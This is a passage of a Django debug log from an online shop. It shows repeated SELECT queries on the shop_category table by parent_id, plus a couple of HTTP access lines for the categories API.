"shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:18:02,194 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:18:02,197 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:18:02,199 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:18:02,201 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:18:02,204 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:18:02,206 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:18:02,209 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:18:02,211 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:18:02,214 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:18:02,216 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:18:02,218 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:18:02,221 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:18:02,224 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:18:02,226 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:18:02,228 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:18:02,230 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:18:02,233 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:18:02,236 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:18:02,238 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:18:02,240 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:18:02,242 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:18:02,245 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:18:02,248 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:18:02,250 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:18:02,253 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:18:02,255 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:18:02,257 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:18:02,259 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:18:02,262 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:18:02,265 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:18:02,267 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:18:02,270 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:18:02,272 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:18:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 09:19:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 09:20:32,831 utils 32506 139738707130112 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:20:32,843 utils 32506 139738707130112 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:20:32,848 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:20:32,850 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:20:32,853 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:20:32,855 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:20:32,858 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:20:32,860 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:20:32,862 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:20:32,869 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:20:32,871 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:20:32,873 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:20:32,875 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:20:32,878 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:20:32,881 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:20:32,883 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:20:32,886 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:20:32,888 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:20:32,890 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:20:32,894 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:20:32,896 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:20:32,898 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:20:32,900 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:20:32,903 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:20:32,905 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:20:32,908 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:20:32,911 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:20:32,913 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:20:32,915 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:20:32,917 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:20:32,921 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:20:32,923 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:20:32,925 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:20:32,928 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) 